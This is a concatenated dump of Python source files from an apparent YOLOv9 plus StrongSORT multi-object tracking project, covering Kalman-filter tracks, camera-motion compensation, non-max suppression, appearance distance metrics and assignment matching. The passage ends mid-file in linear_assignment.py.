class Track:
"""
A single target track with state space `(x, y, a, h)` and associated
velocities, where `(x, y)` is the center of the bounding box, `a` is the
aspect ratio and `h` is the height.
Parameters
----------
mean : ndarray
Mean vector of the initial state distribution.
covariance : ndarray
Covariance matrix of the initial state distribution.
track_id : int
A unique track identifier.
n_init : int
Number of consecutive detections before the track is confirmed. The
track state is set to `Deleted` if a miss occurs within the first
`n_init` frames.
max_age : int
The maximum number of consecutive misses before the track state is
set to `Deleted`.
feature : Optional[ndarray]
Feature vector of the detection this track originates from. If not None,
this feature is added to the `features` cache.
Attributes
----------
mean : ndarray
Mean vector of the initial state distribution.
covariance : ndarray
Covariance matrix of the initial state distribution.
track_id : int
A unique track identifier.
hits : int
Total number of measurement updates.
age : int
        Total number of frames since first occurrence.
time_since_update : int
Total number of frames since last measurement update.
state : TrackState
The current track state.
features : List[ndarray]
A cache of features. On each measurement update, the associated feature
vector is added to this list.
"""
def __init__(self, detection, track_id, class_id, conf, n_init, max_age, ema_alpha,
feature=None):
self.track_id = track_id
self.class_id = int(class_id)
self.hits = 1
self.age = 1
self.time_since_update = 0
self.ema_alpha = ema_alpha
self.state = TrackState.Tentative
self.features = []
if feature is not None:
feature /= np.linalg.norm(feature)
self.features.append(feature)
self.conf = conf
self._n_init = n_init
self._max_age = max_age
self.kf = KalmanFilter()
self.mean, self.covariance = self.kf.initiate(detection)
def to_tlwh(self):
"""Get current position in bounding box format `(top left x, top left y,
width, height)`.
Returns
-------
ndarray
The bounding box.
"""
ret = self.mean[:4].copy()
ret[2] *= ret[3]
ret[:2] -= ret[2:] / 2
return ret
def to_tlbr(self):
"""Get kf estimated current position in bounding box format `(min x, miny, max x,
max y)`.
Returns
-------
ndarray
The predicted kf bounding box.
"""
ret = self.to_tlwh()
ret[2:] = ret[:2] + ret[2:]
return ret
def ECC(self, src, dst, warp_mode = cv2.MOTION_EUCLIDEAN, eps = 1e-5,
max_iter = 100, scale = 0.1, align = False):
"""Compute the warp matrix from src to dst.
Parameters
----------
src : ndarray
An NxM matrix of source img(BGR or Gray), it must be the same format as dst.
dst : ndarray
An NxM matrix of target img(BGR or Gray).
warp_mode: flags of opencv
translation: cv2.MOTION_TRANSLATION
rotated and shifted: cv2.MOTION_EUCLIDEAN
affine(shift,rotated,shear): cv2.MOTION_AFFINE
homography(3d): cv2.MOTION_HOMOGRAPHY
eps: float
the threshold of the increment in the correlation coefficient between two iterations
max_iter: int
the number of iterations.
scale: float or [int, int]
scale_ratio: float
scale_size: [W, H]
align: bool
        whether to also warp the source image (affine or perspective) and return it
Returns
-------
warp matrix : ndarray
Returns the warp matrix from src to dst.
if motion models is homography, the warp matrix will be 3x3, otherwise 2x3
src_aligned: ndarray
aligned source image of gray
"""
        # skip if either the current or the previous frame is not initialized yet
        # (happens on the very first inference)
        if src is None or dst is None:
            return None, None
        # skip if current and previous frames are not the same size
        elif src.shape != dst.shape:
            return None, None
# BGR2GRAY
if src.ndim == 3:
# Convert images to grayscale
src = cv2.cvtColor(src, cv2.COLOR_BGR2GRAY)
dst = cv2.cvtColor(dst, cv2.COLOR_BGR2GRAY)
# make the imgs smaller to speed up
if scale is not None:
if isinstance(scale, float) or isinstance(scale, int):
if scale != 1:
src_r = cv2.resize(src, (0, 0), fx = scale, fy = scale,interpolation = cv2.INTER_LINEAR)
dst_r = cv2.resize(dst, (0, 0), fx = scale, fy = scale,interpolation = cv2.INTER_LINEAR)
scale = [scale, scale]
else:
src_r, dst_r = src, dst
scale = None
else:
if scale[0] != src.shape[1] and scale[1] != src.shape[0]:
src_r = cv2.resize(src, (scale[0], scale[1]), interpolation = cv2.INTER_LINEAR)
dst_r = cv2.resize(dst, (scale[0], scale[1]), interpolation=cv2.INTER_LINEAR)
scale = [scale[0] / src.shape[1], scale[1] / src.shape[0]]
else:
src_r, dst_r = src, dst
scale = None
else:
src_r, dst_r = src, dst
# Define 2x3 or 3x3 matrices and initialize the matrix to identity
if warp_mode == cv2.MOTION_HOMOGRAPHY :
warp_matrix = np.eye(3, 3, dtype=np.float32)
else :
warp_matrix = np.eye(2, 3, dtype=np.float32)
# Define termination criteria
criteria = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, max_iter, eps)
# Run the ECC algorithm. The results are stored in warp_matrix.
try:
(cc, warp_matrix) = cv2.findTransformECC (src_r, dst_r, warp_matrix, warp_mode, criteria, None, 1)
except cv2.error as e:
return None, None
if scale is not None:
warp_matrix[0, 2] = warp_matrix[0, 2] / scale[0]
warp_matrix[1, 2] = warp_matrix[1, 2] / scale[1]
if align:
sz = src.shape
if warp_mode == cv2.MOTION_HOMOGRAPHY:
# Use warpPerspective for Homography
src_aligned = cv2.warpPerspective(src, warp_matrix, (sz[1],sz[0]), flags=cv2.INTER_LINEAR)
else :
# Use warpAffine for Translation, Euclidean and Affine
src_aligned = cv2.warpAffine(src, warp_matrix, (sz[1],sz[0]), flags=cv2.INTER_LINEAR)
return warp_matrix, src_aligned
else:
return warp_matrix, None
def get_matrix(self, matrix):
eye = np.eye(3)
dist = np.linalg.norm(eye - matrix)
if dist < 100:
return matrix
else:
return eye
def camera_update(self, previous_frame, next_frame):
warp_matrix, src_aligned = self.ECC(previous_frame, next_frame)
if warp_matrix is None and src_aligned is None:
return
[a,b] = warp_matrix
warp_matrix=np.array([a,b,[0,0,1]])
warp_matrix = warp_matrix.tolist()
matrix = self.get_matrix(warp_matrix)
x1, y1, x2, y2 = self.to_tlbr()
x1_, y1_, _ = matrix @ np.array([x1, y1, 1]).T
x2_, y2_, _ = matrix @ np.array([x2, y2, 1]).T
w, h = x2_ - x1_, y2_ - y1_
cx, cy = x1_ + w / 2, y1_ + h / 2
self.mean[:4] = [cx, cy, w / h, h]
def increment_age(self):
self.age += 1
self.time_since_update += 1
def predict(self, kf):
"""Propagate the state distribution to the current time step using a
Kalman filter prediction step.
Parameters
----------
kf : kalman_filter.KalmanFilter
The Kalman filter.
"""
self.mean, self.covariance = self.kf.predict(self.mean, self.covariance)
self.age += 1
self.time_since_update += 1
def update(self, detection, class_id, conf):
"""Perform Kalman filter measurement update step and update the feature
cache.
Parameters
----------
detection : Detection
The associated detection.
"""
self.conf = conf
self.class_id = class_id.int()
self.mean, self.covariance = self.kf.update(self.mean, self.covariance, detection.to_xyah(), detection.confidence)
feature = detection.feature / np.linalg.norm(detection.feature)
smooth_feat = self.ema_alpha * self.features[-1] + (1 - self.ema_alpha) * feature
smooth_feat /= np.linalg.norm(smooth_feat)
self.features = [smooth_feat]
self.hits += 1
self.time_since_update = 0
if self.state == TrackState.Tentative and self.hits >= self._n_init:
self.state = TrackState.Confirmed
def mark_missed(self):
"""Mark this track as missed (no association at the current time step).
"""
if self.state == TrackState.Tentative:
self.state = TrackState.Deleted
elif self.time_since_update > self._max_age:
self.state = TrackState.Deleted
def is_tentative(self):
"""Returns True if this track is tentative (unconfirmed).
"""
return self.state == TrackState.Tentative
def is_confirmed(self):
"""Returns True if this track is confirmed."""
return self.state == TrackState.Confirmed
def is_deleted(self):
"""Returns True if this track is dead and should be deleted."""
return self.state == TrackState.Deleted
| 10,631 | Python | .py | 258 | 31.44186 | 122 | 0.589358 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,115 | preprocessing.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/sort/preprocessing.py | # vim: expandtab:ts=4:sw=4
import numpy as np
import cv2
def non_max_suppression(boxes, max_bbox_overlap, scores=None):
"""Suppress overlapping detections.
Original code from [1]_ has been adapted to include confidence score.
.. [1] http://www.pyimagesearch.com/2015/02/16/
faster-non-maximum-suppression-python/
Examples
--------
>>> boxes = [d.roi for d in detections]
>>> scores = [d.confidence for d in detections]
>>> indices = non_max_suppression(boxes, max_bbox_overlap, scores)
>>> detections = [detections[i] for i in indices]
Parameters
----------
boxes : ndarray
Array of ROIs (x, y, width, height).
max_bbox_overlap : float
ROIs that overlap more than this values are suppressed.
scores : Optional[array_like]
Detector confidence score.
Returns
-------
List[int]
Returns indices of detections that have survived non-maxima suppression.
"""
if len(boxes) == 0:
return []
    boxes = boxes.astype(float)  # np.float alias was removed in NumPy >= 1.24
pick = []
x1 = boxes[:, 0]
y1 = boxes[:, 1]
x2 = boxes[:, 2] + boxes[:, 0]
y2 = boxes[:, 3] + boxes[:, 1]
area = (x2 - x1 + 1) * (y2 - y1 + 1)
if scores is not None:
idxs = np.argsort(scores)
else:
idxs = np.argsort(y2)
while len(idxs) > 0:
last = len(idxs) - 1
i = idxs[last]
pick.append(i)
xx1 = np.maximum(x1[i], x1[idxs[:last]])
yy1 = np.maximum(y1[i], y1[idxs[:last]])
xx2 = np.minimum(x2[i], x2[idxs[:last]])
yy2 = np.minimum(y2[i], y2[idxs[:last]])
w = np.maximum(0, xx2 - xx1 + 1)
h = np.maximum(0, yy2 - yy1 + 1)
overlap = (w * h) / area[idxs[:last]]
idxs = np.delete(
idxs, np.concatenate(
([last], np.where(overlap > max_bbox_overlap)[0])))
return pick
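# Minimal self-contained demo (editor's addition, values are illustrative only):
# two heavily overlapping boxes plus one distant box; the lower-scored overlapping
# box should be suppressed.
if __name__ == '__main__':
    demo_boxes = np.array([[10, 10, 50, 50],
                           [12, 12, 50, 50],
                           [200, 200, 40, 40]], dtype=float)
    demo_scores = np.array([0.9, 0.8, 0.7])
    keep = non_max_suppression(demo_boxes, max_bbox_overlap=0.5, scores=demo_scores)
    print(keep)  # expected: [0, 2]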
| 1,914 | Python | .py | 55 | 27.672727 | 80 | 0.571972 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,116 | nn_matching.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/sort/nn_matching.py | # vim: expandtab:ts=4:sw=4
import numpy as np
import sys
import torch
sys.path.append('strong_sort/deep/reid')
from torchreid.reid.metrics.distance import compute_distance_matrix
def _pdist(a, b):
"""Compute pair-wise squared distance between points in `a` and `b`.
Parameters
----------
a : array_like
An NxM matrix of N samples of dimensionality M.
b : array_like
An LxM matrix of L samples of dimensionality M.
Returns
-------
ndarray
        Returns a matrix of size len(a), len(b) such that element (i, j)
contains the squared distance between `a[i]` and `b[j]`.
"""
a, b = np.asarray(a), np.asarray(b)
if len(a) == 0 or len(b) == 0:
return np.zeros((len(a), len(b)))
a2, b2 = np.square(a).sum(axis=1), np.square(b).sum(axis=1)
r2 = -2. * np.dot(a, b.T) + a2[:, None] + b2[None, :]
r2 = np.clip(r2, 0., float(np.inf))
return r2
def _cosine_distance(a, b, data_is_normalized=False):
"""Compute pair-wise cosine distance between points in `a` and `b`.
Parameters
----------
a : array_like
An NxM matrix of N samples of dimensionality M.
b : array_like
An LxM matrix of L samples of dimensionality M.
data_is_normalized : Optional[bool]
If True, assumes rows in a and b are unit length vectors.
        Otherwise, a and b are explicitly normalized to length 1.
    Returns
    -------
    ndarray
        Returns a matrix of size len(a), len(b) such that element (i, j)
        contains the cosine distance between `a[i]` and `b[j]`.
"""
if not data_is_normalized:
a = np.asarray(a) / np.linalg.norm(a, axis=1, keepdims=True)
b = np.asarray(b) / np.linalg.norm(b, axis=1, keepdims=True)
return 1. - np.dot(a, b.T)
def _nn_euclidean_distance(x, y):
""" Helper function for nearest neighbor distance metric (Euclidean).
Parameters
----------
x : ndarray
A matrix of N row-vectors (sample points).
y : ndarray
A matrix of M row-vectors (query points).
Returns
-------
ndarray
A vector of length M that contains for each entry in `y` the
smallest Euclidean distance to a sample in `x`.
"""
x_ = torch.from_numpy(np.asarray(x) / np.linalg.norm(x, axis=1, keepdims=True))
y_ = torch.from_numpy(np.asarray(y) / np.linalg.norm(y, axis=1, keepdims=True))
distances = compute_distance_matrix(x_, y_, metric='euclidean')
return np.maximum(0.0, torch.min(distances, axis=0)[0].numpy())
def _nn_cosine_distance(x, y):
""" Helper function for nearest neighbor distance metric (cosine).
Parameters
----------
x : ndarray
A matrix of N row-vectors (sample points).
y : ndarray
A matrix of M row-vectors (query points).
Returns
-------
ndarray
A vector of length M that contains for each entry in `y` the
smallest cosine distance to a sample in `x`.
"""
x_ = torch.from_numpy(np.asarray(x))
y_ = torch.from_numpy(np.asarray(y))
distances = compute_distance_matrix(x_, y_, metric='cosine')
distances = distances.cpu().detach().numpy()
return distances.min(axis=0)
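# Editor's note: both helpers above are thin wrappers around torchreid's
# compute_distance_matrix; a rough sketch of their contract (shapes only) is
#
#     x = np.random.rand(5, 128)        # 5 stored gallery features of one track
#     y = np.random.rand(3, 128)        # 3 query features from new detections
#     d = _nn_cosine_distance(x, y)     # shape (3,): smallest distance per query
#
# NearestNeighborDistanceMetric below selects one of them via its `metric` argument.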
class NearestNeighborDistanceMetric(object):
"""
A nearest neighbor distance metric that, for each target, returns
the closest distance to any sample that has been observed so far.
Parameters
----------
metric : str
Either "euclidean" or "cosine".
matching_threshold: float
The matching threshold. Samples with larger distance are considered an
invalid match.
budget : Optional[int]
If not None, fix samples per class to at most this number. Removes
the oldest samples when the budget is reached.
Attributes
----------
samples : Dict[int -> List[ndarray]]
A dictionary that maps from target identities to the list of samples
that have been observed so far.
"""
def __init__(self, metric, matching_threshold, budget=None):
if metric == "euclidean":
self._metric = _nn_euclidean_distance
elif metric == "cosine":
self._metric = _nn_cosine_distance
else:
raise ValueError(
"Invalid metric; must be either 'euclidean' or 'cosine'")
self.matching_threshold = matching_threshold
self.budget = budget
self.samples = {}
def partial_fit(self, features, targets, active_targets):
"""Update the distance metric with new data.
Parameters
----------
features : ndarray
An NxM matrix of N features of dimensionality M.
targets : ndarray
An integer array of associated target identities.
active_targets : List[int]
A list of targets that are currently present in the scene.
"""
for feature, target in zip(features, targets):
self.samples.setdefault(target, []).append(feature)
if self.budget is not None:
self.samples[target] = self.samples[target][-self.budget:]
self.samples = {k: self.samples[k] for k in active_targets}
def distance(self, features, targets):
"""Compute distance between features and targets.
Parameters
----------
features : ndarray
An NxM matrix of N features of dimensionality M.
targets : List[int]
A list of targets to match the given `features` against.
Returns
-------
ndarray
Returns a cost matrix of shape len(targets), len(features), where
element (i, j) contains the closest squared distance between
`targets[i]` and `features[j]`.
"""
cost_matrix = np.zeros((len(targets), len(features)))
for i, target in enumerate(targets):
cost_matrix[i, :] = self._metric(self.samples[target], features)
return cost_matrix | 5,962 | Python | .py | 151 | 32.337748 | 83 | 0.625625 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,117 | kalman_filter.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/sort/kalman_filter.py | # vim: expandtab:ts=4:sw=4
import numpy as np
import scipy.linalg
"""
Table for the 0.95 quantile of the chi-square distribution with N degrees of
freedom (contains values for N=1, ..., 9). Taken from MATLAB/Octave's chi2inv
function and used as Mahalanobis gating threshold.
"""
chi2inv95 = {
1: 3.8415,
2: 5.9915,
3: 7.8147,
4: 9.4877,
5: 11.070,
6: 12.592,
7: 14.067,
8: 15.507,
9: 16.919}
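# How the table is used (editor's sketch): with a full (x, y, a, h) measurement,
# the squared Mahalanobis distance from KalmanFilter.gating_distance() is compared
# against chi2inv95[4] = 9.4877; larger distances mark the track/detection pair as
# an infeasible association, e.g.
#
#     gd = kf.gating_distance(mean, covariance, measurements)   # shape (N,)
#     feasible = gd <= chi2inv95[4]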
class KalmanFilter(object):
"""
A simple Kalman filter for tracking bounding boxes in image space.
The 8-dimensional state space
x, y, a, h, vx, vy, va, vh
contains the bounding box center position (x, y), aspect ratio a, height h,
and their respective velocities.
Object motion follows a constant velocity model. The bounding box location
(x, y, a, h) is taken as direct observation of the state space (linear
observation model).
"""
def __init__(self):
ndim, dt = 4, 1.
# Create Kalman filter model matrices.
self._motion_mat = np.eye(2 * ndim, 2 * ndim)
for i in range(ndim):
self._motion_mat[i, ndim + i] = dt
self._update_mat = np.eye(ndim, 2 * ndim)
# Motion and observation uncertainty are chosen relative to the current
# state estimate. These weights control the amount of uncertainty in
# the model. This is a bit hacky.
self._std_weight_position = 1. / 20
self._std_weight_velocity = 1. / 160
def initiate(self, measurement):
"""Create track from unassociated measurement.
Parameters
----------
measurement : ndarray
Bounding box coordinates (x, y, a, h) with center position (x, y),
aspect ratio a, and height h.
Returns
-------
(ndarray, ndarray)
Returns the mean vector (8 dimensional) and covariance matrix (8x8
dimensional) of the new track. Unobserved velocities are initialized
to 0 mean.
"""
mean_pos = measurement
mean_vel = np.zeros_like(mean_pos)
mean = np.r_[mean_pos, mean_vel]
std = [
2 * self._std_weight_position * measurement[0], # the center point x
2 * self._std_weight_position * measurement[1], # the center point y
1 * measurement[2], # the ratio of width/height
2 * self._std_weight_position * measurement[3], # the height
10 * self._std_weight_velocity * measurement[0],
10 * self._std_weight_velocity * measurement[1],
0.1 * measurement[2],
10 * self._std_weight_velocity * measurement[3]]
covariance = np.diag(np.square(std))
return mean, covariance
def predict(self, mean, covariance):
"""Run Kalman filter prediction step.
Parameters
----------
mean : ndarray
The 8 dimensional mean vector of the object state at the previous
time step.
covariance : ndarray
The 8x8 dimensional covariance matrix of the object state at the
previous time step.
Returns
-------
(ndarray, ndarray)
Returns the mean vector and covariance matrix of the predicted
state. Unobserved velocities are initialized to 0 mean.
"""
std_pos = [
self._std_weight_position * mean[0],
self._std_weight_position * mean[1],
1 * mean[2],
self._std_weight_position * mean[3]]
std_vel = [
self._std_weight_velocity * mean[0],
self._std_weight_velocity * mean[1],
0.1 * mean[2],
self._std_weight_velocity * mean[3]]
motion_cov = np.diag(np.square(np.r_[std_pos, std_vel]))
mean = np.dot(self._motion_mat, mean)
covariance = np.linalg.multi_dot((
self._motion_mat, covariance, self._motion_mat.T)) + motion_cov
return mean, covariance
def project(self, mean, covariance, confidence=.0):
"""Project state distribution to measurement space.
Parameters
----------
mean : ndarray
The state's mean vector (8 dimensional array).
covariance : ndarray
The state's covariance matrix (8x8 dimensional).
        confidence: (dyh) detection confidence score
Returns
-------
(ndarray, ndarray)
Returns the projected mean and covariance matrix of the given state
estimate.
"""
std = [
self._std_weight_position * mean[3],
self._std_weight_position * mean[3],
1e-1,
self._std_weight_position * mean[3]]
std = [(1 - confidence) * x for x in std]
innovation_cov = np.diag(np.square(std))
mean = np.dot(self._update_mat, mean)
covariance = np.linalg.multi_dot((
self._update_mat, covariance, self._update_mat.T))
return mean, covariance + innovation_cov
def update(self, mean, covariance, measurement, confidence=.0):
"""Run Kalman filter correction step.
Parameters
----------
mean : ndarray
The predicted state's mean vector (8 dimensional).
covariance : ndarray
The state's covariance matrix (8x8 dimensional).
measurement : ndarray
The 4 dimensional measurement vector (x, y, a, h), where (x, y)
is the center position, a the aspect ratio, and h the height of the
bounding box.
        confidence: (dyh) detection confidence score
Returns
-------
(ndarray, ndarray)
Returns the measurement-corrected state distribution.
"""
projected_mean, projected_cov = self.project(mean, covariance, confidence)
chol_factor, lower = scipy.linalg.cho_factor(
projected_cov, lower=True, check_finite=False)
kalman_gain = scipy.linalg.cho_solve(
(chol_factor, lower), np.dot(covariance, self._update_mat.T).T,
check_finite=False).T
innovation = measurement - projected_mean
new_mean = mean + np.dot(innovation, kalman_gain.T)
new_covariance = covariance - np.linalg.multi_dot((
kalman_gain, projected_cov, kalman_gain.T))
return new_mean, new_covariance
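    # Hedged usage sketch (editor's addition, numbers illustrative): one
    # constant-velocity cycle of this filter looks roughly like
    #
    #     kf = KalmanFilter()
    #     mean, cov = kf.initiate(np.array([320., 240., 0.5, 100.]))   # x, y, a, h
    #     mean, cov = kf.predict(mean, cov)                            # one frame ahead
    #     mean, cov = kf.update(mean, cov,
    #                           np.array([322., 241., 0.5, 101.]),     # new measurement
    #                           confidence=0.9)
    #
    # The confidence term implements the NSA update used by StrongSORT: measurement
    # noise shrinks as detector confidence grows (see project()).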
def gating_distance(self, mean, covariance, measurements,
only_position=False):
"""Compute gating distance between state distribution and measurements.
A suitable distance threshold can be obtained from `chi2inv95`. If
`only_position` is False, the chi-square distribution has 4 degrees of
freedom, otherwise 2.
Parameters
----------
mean : ndarray
Mean vector over the state distribution (8 dimensional).
covariance : ndarray
Covariance of the state distribution (8x8 dimensional).
measurements : ndarray
An Nx4 dimensional matrix of N measurements, each in
format (x, y, a, h) where (x, y) is the bounding box center
position, a the aspect ratio, and h the height.
only_position : Optional[bool]
If True, distance computation is done with respect to the bounding
box center position only.
Returns
-------
ndarray
Returns an array of length N, where the i-th element contains the
squared Mahalanobis distance between (mean, covariance) and
`measurements[i]`.
"""
mean, covariance = self.project(mean, covariance)
if only_position:
mean, covariance = mean[:2], covariance[:2, :2]
measurements = measurements[:, :2]
cholesky_factor = np.linalg.cholesky(covariance)
d = measurements - mean
z = scipy.linalg.solve_triangular(
cholesky_factor, d.T, lower=True, check_finite=False,
overwrite_b=True)
squared_maha = np.sum(z * z, axis=0)
return squared_maha | 8,114 | Python | .py | 192 | 32.567708 | 89 | 0.598832 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,118 | tracker.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/sort/tracker.py | # vim: expandtab:ts=4:sw=4
from __future__ import absolute_import
import numpy as np
from . import kalman_filter
from . import linear_assignment
from . import iou_matching
from .track import Track
class Tracker:
"""
This is the multi-target tracker.
Parameters
----------
metric : nn_matching.NearestNeighborDistanceMetric
A distance metric for measurement-to-track association.
max_age : int
Maximum number of missed misses before a track is deleted.
n_init : int
Number of consecutive detections before the track is confirmed. The
track state is set to `Deleted` if a miss occurs within the first
`n_init` frames.
Attributes
----------
metric : nn_matching.NearestNeighborDistanceMetric
The distance metric used for measurement to track association.
max_age : int
Maximum number of missed misses before a track is deleted.
n_init : int
Number of frames that a track remains in initialization phase.
kf : kalman_filter.KalmanFilter
A Kalman filter to filter target trajectories in image space.
tracks : List[Track]
The list of active tracks at the current time step.
"""
GATING_THRESHOLD = np.sqrt(kalman_filter.chi2inv95[4])
def __init__(self, metric, max_iou_distance=0.9, max_age=30, n_init=3, _lambda=0, ema_alpha=0.9, mc_lambda=0.995):
self.metric = metric
self.max_iou_distance = max_iou_distance
self.max_age = max_age
self.n_init = n_init
self._lambda = _lambda
self.ema_alpha = ema_alpha
self.mc_lambda = mc_lambda
self.kf = kalman_filter.KalmanFilter()
self.tracks = []
self._next_id = 1
def predict(self):
"""Propagate track state distributions one time step forward.
This function should be called once every time step, before `update`.
"""
for track in self.tracks:
track.predict(self.kf)
def increment_ages(self):
for track in self.tracks:
track.increment_age()
track.mark_missed()
def camera_update(self, previous_img, current_img):
for track in self.tracks:
track.camera_update(previous_img, current_img)
def update(self, detections, classes, confidences):
"""Perform measurement update and track management.
Parameters
----------
detections : List[deep_sort.detection.Detection]
A list of detections at the current time step.
"""
# Run matching cascade.
matches, unmatched_tracks, unmatched_detections = \
self._match(detections)
# Update track set.
for track_idx, detection_idx in matches:
self.tracks[track_idx].update(
detections[detection_idx], classes[detection_idx], confidences[detection_idx])
for track_idx in unmatched_tracks:
self.tracks[track_idx].mark_missed()
for detection_idx in unmatched_detections:
self._initiate_track(detections[detection_idx], classes[detection_idx].item(), confidences[detection_idx].item())
self.tracks = [t for t in self.tracks if not t.is_deleted()]
# Update distance metric.
active_targets = [t.track_id for t in self.tracks if t.is_confirmed()]
features, targets = [], []
for track in self.tracks:
if not track.is_confirmed():
continue
features += track.features
targets += [track.track_id for _ in track.features]
self.metric.partial_fit(np.asarray(features), np.asarray(targets), active_targets)
def _full_cost_metric(self, tracks, dets, track_indices, detection_indices):
"""
This implements the full lambda-based cost-metric. However, in doing so, it disregards
the possibility to gate the position only which is provided by
linear_assignment.gate_cost_matrix(). Instead, I gate by everything.
Note that the Mahalanobis distance is itself an unnormalised metric. Given the cosine
distance being normalised, we employ a quick and dirty normalisation based on the
threshold: that is, we divide the positional-cost by the gating threshold, thus ensuring
that the valid values range 0-1.
Note also that the authors work with the squared distance. I also sqrt this, so that it
is more intuitive in terms of values.
"""
# Compute First the Position-based Cost Matrix
pos_cost = np.empty([len(track_indices), len(detection_indices)])
msrs = np.asarray([dets[i].to_xyah() for i in detection_indices])
for row, track_idx in enumerate(track_indices):
pos_cost[row, :] = np.sqrt(
self.kf.gating_distance(
tracks[track_idx].mean, tracks[track_idx].covariance, msrs, False
)
) / self.GATING_THRESHOLD
pos_gate = pos_cost > 1.0
# Now Compute the Appearance-based Cost Matrix
app_cost = self.metric.distance(
np.array([dets[i].feature for i in detection_indices]),
np.array([tracks[i].track_id for i in track_indices]),
)
app_gate = app_cost > self.metric.matching_threshold
# Now combine and threshold
cost_matrix = self._lambda * pos_cost + (1 - self._lambda) * app_cost
cost_matrix[np.logical_or(pos_gate, app_gate)] = linear_assignment.INFTY_COST
# Return Matrix
return cost_matrix
def _match(self, detections):
def gated_metric(tracks, dets, track_indices, detection_indices):
features = np.array([dets[i].feature for i in detection_indices])
targets = np.array([tracks[i].track_id for i in track_indices])
cost_matrix = self.metric.distance(features, targets)
cost_matrix = linear_assignment.gate_cost_matrix(cost_matrix, tracks, dets, track_indices, detection_indices)
return cost_matrix
# Split track set into confirmed and unconfirmed tracks.
confirmed_tracks = [
i for i, t in enumerate(self.tracks) if t.is_confirmed()]
unconfirmed_tracks = [
i for i, t in enumerate(self.tracks) if not t.is_confirmed()]
# Associate confirmed tracks using appearance features.
matches_a, unmatched_tracks_a, unmatched_detections = \
linear_assignment.matching_cascade(
gated_metric, self.metric.matching_threshold, self.max_age,
self.tracks, detections, confirmed_tracks)
# Associate remaining tracks together with unconfirmed tracks using IOU.
iou_track_candidates = unconfirmed_tracks + [
k for k in unmatched_tracks_a if
self.tracks[k].time_since_update == 1]
unmatched_tracks_a = [
k for k in unmatched_tracks_a if
self.tracks[k].time_since_update != 1]
matches_b, unmatched_tracks_b, unmatched_detections = \
linear_assignment.min_cost_matching(
iou_matching.iou_cost, self.max_iou_distance, self.tracks,
detections, iou_track_candidates, unmatched_detections)
matches = matches_a + matches_b
unmatched_tracks = list(set(unmatched_tracks_a + unmatched_tracks_b))
return matches, unmatched_tracks, unmatched_detections
def _initiate_track(self, detection, class_id, conf):
self.tracks.append(Track(
detection.to_xyah(), self._next_id, class_id, conf, self.n_init, self.max_age, self.ema_alpha,
detection.feature))
self._next_id += 1
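    # Editor's sketch of the per-frame driving loop (simplified; the actual caller
    # is the StrongSORT wrapper, and the names below are illustrative):
    #
    #     metric = NearestNeighborDistanceMetric("cosine", matching_threshold=0.2, budget=100)
    #     tracker = Tracker(metric)
    #     for detections, classes, confidences in stream:        # per frame
    #         tracker.predict()                                  # propagate Kalman states
    #         tracker.update(detections, classes, confidences)   # associate + manage tracks
    #         confirmed = [t for t in tracker.tracks if t.is_confirmed()]
    #
    # `detections` are strong_sort.sort.detection.Detection objects; `classes` and
    # `confidences` are per-detection tensors aligned with them.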
| 7,684 | Python | .py | 155 | 40.174194 | 125 | 0.649527 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,119 | linear_assignment.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/sort/linear_assignment.py | # vim: expandtab:ts=4:sw=4
from __future__ import absolute_import
import numpy as np
from scipy.optimize import linear_sum_assignment
from . import kalman_filter
INFTY_COST = 1e+5
def min_cost_matching(
distance_metric, max_distance, tracks, detections, track_indices=None,
detection_indices=None):
"""Solve linear assignment problem.
Parameters
----------
    distance_metric : Callable[List[Track], List[Detection], List[int], List[int]] -> ndarray
The distance metric is given a list of tracks and detections as well as
a list of N track indices and M detection indices. The metric should
return the NxM dimensional cost matrix, where element (i, j) is the
association cost between the i-th track in the given track indices and
the j-th detection in the given detection_indices.
max_distance : float
Gating threshold. Associations with cost larger than this value are
disregarded.
tracks : List[track.Track]
A list of predicted tracks at the current time step.
detections : List[detection.Detection]
A list of detections at the current time step.
track_indices : List[int]
List of track indices that maps rows in `cost_matrix` to tracks in
`tracks` (see description above).
detection_indices : List[int]
List of detection indices that maps columns in `cost_matrix` to
detections in `detections` (see description above).
Returns
-------
(List[(int, int)], List[int], List[int])
Returns a tuple with the following three entries:
* A list of matched track and detection indices.
* A list of unmatched track indices.
* A list of unmatched detection indices.
"""
if track_indices is None:
track_indices = np.arange(len(tracks))
if detection_indices is None:
detection_indices = np.arange(len(detections))
if len(detection_indices) == 0 or len(track_indices) == 0:
return [], track_indices, detection_indices # Nothing to match.
cost_matrix = distance_metric(
tracks, detections, track_indices, detection_indices)
cost_matrix[cost_matrix > max_distance] = max_distance + 1e-5
row_indices, col_indices = linear_sum_assignment(cost_matrix)
matches, unmatched_tracks, unmatched_detections = [], [], []
for col, detection_idx in enumerate(detection_indices):
if col not in col_indices:
unmatched_detections.append(detection_idx)
for row, track_idx in enumerate(track_indices):
if row not in row_indices:
unmatched_tracks.append(track_idx)
for row, col in zip(row_indices, col_indices):
track_idx = track_indices[row]
detection_idx = detection_indices[col]
if cost_matrix[row, col] > max_distance:
unmatched_tracks.append(track_idx)
unmatched_detections.append(detection_idx)
else:
matches.append((track_idx, detection_idx))
return matches, unmatched_tracks, unmatched_detections
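# Editor's sketch of the calling convention (values are illustrative): the tracker
# uses this both for appearance matching and for IOU matching, e.g.
#
#     matches, unmatched_tracks, unmatched_detections = min_cost_matching(
#         iou_matching.iou_cost, max_distance=0.7,
#         tracks=tracks, detections=detections,
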